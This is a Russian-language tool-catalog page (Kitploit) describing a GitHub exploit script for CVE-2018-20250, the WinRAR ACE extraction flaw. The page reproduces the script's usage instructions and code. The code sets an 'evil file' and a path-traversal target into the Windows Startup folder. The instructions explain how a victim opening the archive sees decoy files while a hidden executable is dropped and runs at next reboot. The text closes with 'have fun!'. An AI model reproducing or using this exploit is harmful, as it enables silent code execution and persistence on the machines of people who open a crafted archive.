Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-20250 — Эксплойт-скрипт для CVE-2018-20250, который автоматически создаёт вредоносные RAR-архивы для выполнения кода через уязвимость извлечения ACE-файлов в WinRAR. | Kitploit
Инструменты/GitHubGitHub/aeolustf/cve-2018-20250
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubaeolustf/cve-2018-20250

CVE-2018-20250

Эксплойт-скрипт для CVE-2018-20250, который автоматически создаёт вредоносные RAR-архивы для выполнения кода через уязвимость извлечения ACE-файлов в WinRAR.

Репозиторий
17 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

эксплойт для Извлечения выполнения кода из WinRAR

poc от Ridter

как использовать?

вам просто нужно установить python 3.7, подготовить вредоносный файл, который вы хотите запустить, установить нужные значения, этот скрипт эксплойта автоматически сгенерирует вредоносный архивный файл!

  1. установите нужные значения
root@kitploit:~
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. запустите эксплойт, эксплойт автоматически создаст test.rar

  2. если жертва откроет test.rar, она увидит файлы hello.txt и world.txt, вы также можете добавить больше файлов, более привлекательных.

  1. когда он распакует файл, в каталоге автозагрузки пользователя появится ещё один файл с именем hi.exe, на самом деле это calc.exe. когда он перезагрузит компьютер, hi.exe запустится.

веселитесь! :)

Скачать инструмент